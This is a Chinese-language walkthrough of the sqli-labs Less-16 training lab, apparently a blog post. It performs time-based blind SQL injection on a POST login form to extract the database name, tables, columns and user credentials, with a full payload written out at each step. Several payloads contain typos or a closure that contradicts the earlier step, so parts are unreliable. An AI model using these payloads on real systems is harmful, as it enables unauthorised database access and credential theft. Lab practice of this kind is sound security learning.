环境:

目标网站:192.168.99.122:9000/sqli-labs-master/Less-16

攻击环境:浏览器

目标:

获取目标网站数据库的用户名和密码

实验步骤

1.访问目标网站:192.168.99.122:9000/sqli-labs-master/Less-16

2.打开浏览器,输入目标网站并输入参数

image-20211123174912402

3.打开hackerbar,加载当前网址勾选Post data选项,输入request请求包中的network -->request payload,加'页面返回 正常

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1'&passwd=admin&submit=Submit

image-20211123174924071

4.加")返回正常,并显示页面登录成功

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1")&passwd=admin&submit=Submit

image-20211123174953694

5.通过上述结果发现页面无论输入什么都不会出现报错,此时尝试延时注入,发现页面有明显延迟说明页面存在SQL注入,闭合方式("")

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1") and sleep(5)#&passwd=admin&submit=Submit

image-20211123175037198

6.猜解数据库的长度,等于8时发现页面有明显延迟,说明数据库的长度为8。

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1") and if(length(database())=8,sleep(5),1)#&passwd=admin&submit=Submit

在这里插入图片描述

7.猜解数据的名称

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1")and if(left(database(),1)='s',sleep(5),1)#&passwd=admin&submit=Submit

修改left参数,逐步猜解数据库名称

image-20211123175249456

image-20211123175306280

8.猜解security数据中的表的个数

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1") if(((select count(*) from information_schema.tables where table_schema='security')=4),sleep(5),1)#&passwd=admin&submit=Submit

image-20211123175640786

9.猜解数据库表中的名称

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1") and if(left((select table_name from information_schema.tables where table_schema='security' LIMIT 0,1),1)='e',sleep(5),1)#&passwd=admin&submit=Submit

image-20211123180032069

10.猜解表的字段的个数。

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1") and if(((select count(*) from informaion_shchema.columns where table_name='users')=14),sleep(5),1)#&passwd=admin&submit=Submit

image-20211123175719615

image-20211123180548935

11.猜解表的内容的个数

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1") and if(left((select column_name from informaion_shchema.columns where table_name='users' limit 11,1),2) ='id',sleep(5),1) #&passwd=admin&submit=Submit

image-20211123180203689

12.猜解username内容的长度

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1") and if(length((select username  from security.users limit 0,1)) =4,sleep(5),1)#&passwd=admin&submit=Submit

image-20211123180454563

13.猜解猜解password字段内容的长度

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1' and if(length((select password  from security.users limit 0,1)) =4,sleep(5),1)#&passwd=admin&submit=Submit

image-20211123180439873

14.猜解user表的username字段的内容

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1' and if(left((select username  from security.users limit 0,1),1) ='D',sleep(5),1)#&passwd=admin&submit=Submit

image-20211123180314355

15.猜解password字段的内容

http://192.168.99.122:9000/sqli-labs-master/less-16

request payload:

uname=admin1' and if(left((select password  from security.users limit 0,1),1) ='D',sleep(5),1)#&passwd=admin&submit=Submit

image-20211123180331194

Logo

开源鸿蒙跨平台开发社区汇聚开发者与厂商,共建“一次开发,多端部署”的开源生态,致力于降低跨端开发门槛,推动万物智联创新。

更多推荐